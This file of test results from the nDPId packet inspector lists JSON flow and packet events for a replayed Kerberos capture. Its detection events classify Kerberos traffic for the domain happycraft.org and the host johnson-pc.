00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="}
00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk83f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"}
00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZEFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="}
00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="}
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929981,"flow_last_seen":1549337929981,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337929981,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1549337929981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337929981,"pkt":"pB9ywglqAAgCHEeuCABFAADBADZAAIAGkQ+sEAjJrBAICMAKAFgVCzarRRAS7FAYAQB2LAAAqoGWMIGToAMCARKigYsEgYi0+C7lIM6lpWfLcf2ezyusajpC0TYc1OX1vmb3DhkyjRtC5TeZRg9Wzt\/ubCTSXWpwv+zrJOhZpUKxM\/PhogQbKSmJJuvTC3n4CxJc9SponZNFKF1Kt9\/yiDsesCZaEKdbgZEf1rZ1aHAiihciexKw\/Qr8RPyDjBEhr0yc0K8+XP7zeT3kqKdm"}
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAACmEzJAAIAGfi6sEAgIrBAIyQBYwApFEBigFQs3RFAYAQCNWQAABoWQU5dMx7s3k7lFXcqa6uoE3YqM179MtGFm5Pp0PzGMSHM6ikhCYuxEbF8vf630PDV4M+ymDkgmnA6LZ83pNOsEhGLNGEwQsGjuja+QpA2dd9fjedDg4z2eYZ9DeqXNfMVtviu+Fd00prhwc+9nnU9I900bDPmSAhZM9lsL"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337929983,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337929983,"pkt":"pB9ywglqAAgCHEeuCABFAAEyADpAAIAGkJqsEAjJrBAICMAJAYUOQjJnSJfL+1AYAQBrWQAA8TZc0LDMp13P2bhHUwE3wC3znhyPA6u84KleikgMfgmc3jalHTIxDwXMnjy\/W4F7\/2WZoUcx2XOew9rGWayLePl5BZIz7shN5PFXYJc\/9PAyv29TC7M2XLiMKexhyeYlRE9uvUtK9DAnR\/ttWEC9zdC56cQON1H8q936tfR+Slz7RKm2uwASDHI8fSFcEQQxtgqaAo4BBsj3qlqLB0lXoxQ8eGOcEVy2\/38vMlSj+c\/3tdAxc+T2J+ChqVKK6Ti6p9NJhgfdb6n6Fkr1nJ\/E0PHo7Ab3tBkqkSpNzV9oaIDc\/AnEKYXHdAsdm\/IAEKeNDZ3xj3dnB41oCyCZcvi9r2HqvrS9bMHFZEs="}
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
